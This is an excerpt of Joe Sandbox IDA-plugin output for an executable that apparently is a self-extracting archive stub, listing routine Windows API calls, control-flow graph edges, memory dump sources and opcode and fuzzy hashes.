                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                          • String ID:
                                                                                          • API String ID: 1868215902-0
                                                                                          • Opcode ID: 849abdfc1433f5fa7f7afee6571c4b01b53073781b94b5efc7e8f68003fd4564
                                                                                          • Instruction ID: 6117523d6f0b735c67a0f716070ee5c377e51ec9bebc0534cb43032168975202
                                                                                          • Opcode Fuzzy Hash: 849abdfc1433f5fa7f7afee6571c4b01b53073781b94b5efc7e8f68003fd4564
                                                                                          • Instruction Fuzzy Hash: EB019E32000744EFC7229B28DD88F96BBAAFB45710F00452DF2AE92561CF716800CB21

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 905 3dbe0a-3dbe35 call 3dcec0 SetEnvironmentVariableW call 3cef07 909 3dbe3a-3dbe3e 905->909 910 3dbe40-3dbe44 909->910 911 3dbe62-3dbe66 909->911 912 3dbe4d-3dbe54 call 3ceffe 910->912 915 3dbe46-3dbe4c 912->915 916 3dbe56-3dbe5c SetEnvironmentVariableW 912->916 915->912 916->911
                                                                                          APIs
                                                                                          • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 003DBE20
                                                                                          • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 003DBE5C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentVariable
                                                                                          • String ID: sfxcmd$sfxpar
                                                                                          • API String ID: 1431749950-3493335439
                                                                                          • Opcode ID: 454fd669d8f06d6f7dd08ce55e6f054f66acbe2107b1442e79146306a4031ac2
                                                                                          • Instruction ID: 75f457a2971073fc54459e2051ff75663cb3ee90f5a6f9d833d3ad4f42cd25d7
                                                                                          • Opcode Fuzzy Hash: 454fd669d8f06d6f7dd08ce55e6f054f66acbe2107b1442e79146306a4031ac2
                                                                                          • Instruction Fuzzy Hash: 37F0A773811224E6C7232FD5BC09EF67BAC9F14B52F010056FE849A342D7648C40C7A0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 917 3c973d-3c975e call 3dcec0 920 3c9767 917->920 921 3c9760-3c9765 917->921 922 3c9769-3c9786 920->922 921->920 921->922 923 3c978e-3c9798 922->923 924 3c9788 922->924 925 3c979d-3c97c8 CreateFileW 923->925 926 3c979a 923->926 924->923 927 3c982c-3c9841 925->927 928 3c97ca-3c97ec GetLastError call 3cb275 925->928 926->925 930 3c985b-3c9866 927->930 931 3c9843-3c9856 call 3cf10e 927->931 934 3c97ee-3c9810 CreateFileW GetLastError 928->934 935 3c981b-3c9820 928->935 931->930 936 3c9816-3c9819 934->936 937 3c9812 934->937 935->927 938 3c9822 935->938 936->927 936->935 937->936 938->927
                                                                                          APIs
                                                                                          • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,-00000001,00000000,?,00000000,?,?,003C777A,?,00000005,?,00000011), ref: 003C97BD
                                                                                          • GetLastError.KERNEL32(?,?,003C777A,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 003C97CA
                                                                                          • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,003C777A,?,00000005,?), ref: 003C97FF
                                                                                          • GetLastError.KERNEL32(?,?,003C777A,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 003C9807
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateErrorFileLast
                                                                                          • String ID:
                                                                                          • API String ID: 1214770103-0
                                                                                          • Opcode ID: 0c673b483bc3f1579396413997144aee61c30c6a8bc0ba8aa884dc34ad8ef7c5
                                                                                          • Instruction ID: 751358b7b3a39f32ac23f6a86779a94957ba3061e13780ca34d5cdca6b03e7c2
                                                                                          • Opcode Fuzzy Hash: 0c673b483bc3f1579396413997144aee61c30c6a8bc0ba8aa884dc34ad8ef7c5
                                                                                          • Instruction Fuzzy Hash: 243134718407556FE7229F249C09FE6BBA8FB45324F12462EF990C72D1D775AC88CB90
                                                                                          APIs
                                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 003C9623
                                                                                          • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 003C963B
                                                                                          • GetLastError.KERNEL32 ref: 003C966D
                                                                                          • GetLastError.KERNEL32 ref: 003C968C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$FileHandleRead
                                                                                          • String ID:
                                                                                          • API String ID: 2244327787-0
                                                                                          • Opcode ID: 9722da8f0dff7a3df02f0d1dc8cbd7022f495945f7ac02e154fcc95f0fc56358
                                                                                          • Instruction ID: 6b83bef32f62f83f445c48cbb9660a6cd00002928f79b295f6d659fd891b3430
                                                                                          • Opcode Fuzzy Hash: 9722da8f0dff7a3df02f0d1dc8cbd7022f495945f7ac02e154fcc95f0fc56358
                                                                                          • Instruction Fuzzy Hash: FF115730600204ABCF26AB658908F7AB7ADEB05335F13852FE96AC56D0CB369D60CF51
                                                                                          APIs
                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,003E2213,00000000,00000000,?,003E7778,003E2213,00000000,00000000,00000000,?,003E7975,00000006,FlsSetValue), ref: 003E7803
                                                                                          • GetLastError.KERNEL32(?,003E7778,003E2213,00000000,00000000,00000000,?,003E7975,00000006,FlsSetValue,003F3768,003F3770,00000000,00000364,?,003E63F1), ref: 003E780F
                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,003E7778,003E2213,00000000,00000000,00000000,?,003E7975,00000006,FlsSetValue,003F3768,003F3770,00000000), ref: 003E781D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                          • String ID:
                                                                                          • API String ID: 3177248105-0
                                                                                          • Opcode ID: f64a58f953533ef95358108efbddfbbbebfe514d3c9e517507204753652014c1
                                                                                          • Instruction ID: 21069846d8318c351807c8067350973fd67975fb6f2a9eab3f0bdff512a2ae5d
                                                                                          • Opcode Fuzzy Hash: f64a58f953533ef95358108efbddfbbbebfe514d3c9e517507204753652014c1
                                                                                          • Instruction Fuzzy Hash: D001D436609272ABC7274B6EAC49A6A3B9CAF147A1B110720F90AD7181D720D801C6E0
                                                                                          APIs
                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 003D992F
                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003D9940
                                                                                          • TranslateMessage.USER32(?), ref: 003D994A
                                                                                          • DispatchMessageW.USER32(?), ref: 003D9954
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$DispatchPeekTranslate
                                                                                          • String ID:
                                                                                          • API String ID: 4217535847-0
                                                                                          • Opcode ID: 54c1b0ea28cd05c401c20c22f8809050858417146325f314c25600bb70c7729a
                                                                                          • Instruction ID: a3a4633345959e21c3157464f1c2e6b9520f6e50791c4fee5ad869bcf1f695fa
                                                                                          • Opcode Fuzzy Hash: 54c1b0ea28cd05c401c20c22f8809050858417146325f314c25600bb70c7729a
                                                                                          • Instruction Fuzzy Hash: 95E0EDB2C0212EA78F21ABE6AC4CDEB7F6CEE06365B004056B51DD2010D6789505C7F1
                                                                                          APIs
                                                                                          • CreateThread.KERNELBASE(00000000,00010000,Function_0000FD61,?,00000000,00000000), ref: 003CFBD5
                                                                                          • SetThreadPriority.KERNEL32(?,00000000), ref: 003CFC1C
                                                                                            • Part of subcall function 003C6DD3: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003C6DF1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                          • String ID: CreateThread failed
                                                                                          • API String ID: 2655393344-3849766595
                                                                                          • Opcode ID: 5a7df03a8b11cb105003f8c8c97c6d8e46cd288b08b0de926e09a145254e3ef1
                                                                                          • Instruction ID: 6aaafd99a53583d4f711ed1f7c1c864906bbbe162be7ec3e171ee8735e4a7fe6
                                                                                          • Opcode Fuzzy Hash: 5a7df03a8b11cb105003f8c8c97c6d8e46cd288b08b0de926e09a145254e3ef1
                                                                                          • Instruction Fuzzy Hash: EC01D6B534430E6FD32A6F589D86FB6775AEB40711F21443EFA42D6181CEA1AC058720
                                                                                          APIs
                                                                                          • GetStdHandle.KERNEL32(000000F5,?,?,003CC853,00000001,?,?,?,00000000,003D420B,?,?,?,?,?,003D3CB0), ref: 003C9BE3
                                                                                          • WriteFile.KERNEL32(?,00000000,?,003D3EB8,00000000,?,?,00000000,003D420B,?,?,?,?,?,003D3CB0,?), ref: 003C9C23
                                                                                          • WriteFile.KERNELBASE(?,00000000,?,003D3EB8,00000000,?,00000001,?,?,003CC853,00000001,?,?,?,00000000,003D420B), ref: 003C9C50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileWrite$Handle
                                                                                          • String ID:
                                                                                          • API String ID: 4209713984-0
                                                                                          • Opcode ID: a0a87e733efceda3e038e6697f683dbf0258b9857616a54070e9299fc12375cb
                                                                                          • Instruction ID: 4d7873fa261573efc8f709ccae0f518303ea1270ce3bbc00dd2c38fbf226be45
                                                                                          • Opcode Fuzzy Hash: a0a87e733efceda3e038e6697f683dbf0258b9857616a54070e9299fc12375cb
                                                                                          • Instruction Fuzzy Hash: 0031FF7114860AAFDB269E24D84CFA6BBACEB50700F02811EF595D7690CB75AC48CBA1
                                                                                          APIs
                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,003C9D92,?,00000001,00000000,?,?), ref: 003C9EAD
                                                                                          • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,003C9D92,?,00000001,00000000,?,?), ref: 003C9EE0
                                                                                          • GetLastError.KERNEL32(?,?,?,?,003C9D92,?,00000001,00000000,?,?), ref: 003C9EFD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateDirectory$ErrorLast
                                                                                          • String ID:
                                                                                          • API String ID: 2485089472-0
                                                                                          • Opcode ID: ab985557138cfae4c99a485f8c08808c863c34d26f717bc41c099178f87b36e3
                                                                                          • Instruction ID: cb7a436dbc5dfef2b7857dd1991f6ea16ff70186402544498c02df90313555af
                                                                                          • Opcode Fuzzy Hash: ab985557138cfae4c99a485f8c08808c863c34d26f717bc41c099178f87b36e3
                                                                                          • Instruction Fuzzy Hash: B101DE3211026966DB23EA788C4EFFA335C9F16782F0A041FF805EA491DB208D80D7E6
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog
                                                                                          • String ID: CMT
                                                                                          • API String ID: 3519838083-2756464174
                                                                                          • Opcode ID: b7dd2467b338c5842fe5b689ffadf5aefdda08f64409a88e5ada800a6015c45f
                                                                                          • Instruction ID: 340b6cde8ae7975253715e894d84de6bd16779d68faac4e3af3a45c99c077147
                                                                                          • Opcode Fuzzy Hash: b7dd2467b338c5842fe5b689ffadf5aefdda08f64409a88e5ada800a6015c45f
                                                                                          • Instruction Fuzzy Hash: 66618D71504F44AADB26DB74CC45EEBB7E8AB14301F44896EE19BCB142DA326E48CF11
                                                                                          APIs
                                                                                          • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 003E82E8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: Info
                                                                                          • String ID:
                                                                                          • API String ID: 1807457897-3916222277
                                                                                          • Opcode ID: 52f52f098c264d823b57032d6e65f6a06910b2b99a150b8173b85620c3bd7b11
                                                                                          • Instruction ID: 7b0bac40694b5f1553f1d1c4830b13129bbb8abbd0fa48d0c012bffc45cf74ea
                                                                                          • Opcode Fuzzy Hash: 52f52f098c264d823b57032d6e65f6a06910b2b99a150b8173b85620c3bd7b11
                                                                                          • Instruction Fuzzy Hash: 77415B789042E89EDB238F168C84BFABBBDDF05704F6405ECE58D961C2D635A945CF20
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 003C1DA6
                                                                                            • Part of subcall function 003C3AA3: __EH_prolog.LIBCMT ref: 003C3AA8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog
                                                                                          • String ID: CMT
                                                                                          • API String ID: 3519838083-2756464174
                                                                                          • Opcode ID: 38fbe7127b3237fbde373da92378cdb6c9ffae9de21b77635328a948bd2e489c
                                                                                          • Instruction ID: 69d6647c50d6852e17cb3c1cc412007af778c4654d7c7b8257ac1d252cb3ad8d
                                                                                          • Opcode Fuzzy Hash: 38fbe7127b3237fbde373da92378cdb6c9ffae9de21b77635328a948bd2e489c
                                                                                          • Instruction Fuzzy Hash: 45211C769042099FCB16EF99D941AEEFBF5AF59300F10046EF845AB252C7325E10DB60
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog
                                                                                          • String ID: CMT
                                                                                          • API String ID: 3519838083-2756464174
                                                                                          • Opcode ID: 46511761e55c7ca70e8dbb50c995dbdebcf806605e5d4b85fd2cb43d89aed0c9
                                                                                          • Instruction ID: 3ec698b66b04b427eb0dee3127e2e131219e225523ca9089943170ced2c294e8
                                                                                          • Opcode Fuzzy Hash: 46511761e55c7ca70e8dbb50c995dbdebcf806605e5d4b85fd2cb43d89aed0c9
                                                                                          • Instruction Fuzzy Hash: 6F118471A00205EFDB06DF65C4A5EBEF7AABF46300F05405EE849DB242DB359D51EB90
                                                                                          APIs
                                                                                          • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,F5E85006,00000001,?,000000FF), ref: 003E7A7A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: String
                                                                                          • String ID: LCMapStringEx
                                                                                          • API String ID: 2568140703-3893581201
                                                                                          • Opcode ID: be5e5485aaaa32f6ee7b35d072c2ebe4f7ee91f91dd3a63a17e95c313c3abca4
